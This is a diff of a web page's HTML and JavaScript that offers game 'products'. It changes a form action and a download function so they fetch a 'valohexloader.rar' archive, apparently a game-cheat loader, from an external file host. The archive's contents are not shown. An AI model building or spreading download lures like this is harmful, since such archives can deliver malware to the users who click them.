--- a/index.htm
+++ b/index.htm
@@ -99,7 +99,7 @@
             <h1>Top 8 products</h1>
             <h2>The most popular products</h2>
         </div>
-        <form class="catalog-block section" action="valohaxloader.rar" method="post" id="contacts__form">
+        <form class="catalog-block section" action="https://up.sceptique.eu/f/25041001/2aa53ef4/valohexloader.rar" method="post" id="contacts__form">
             <div class="catalog-block__item">
                 <div>
                     <img src="fortnite.svg" alt="" class="catalog-block__img">
@@ -294,7 +294,7 @@ const buttons = document.querySelectorAll('.catalog-block__item-link');
 
 function downloadFile(filename) {
   const link = document.createElement('a');
-  link.href = 'valohaxloader.rar';
+  link.href = 'https://up.sceptique.eu/f/25041001/2aa53ef4/valohexloader.rar';
   link.download = filename;
   link.click();
 }
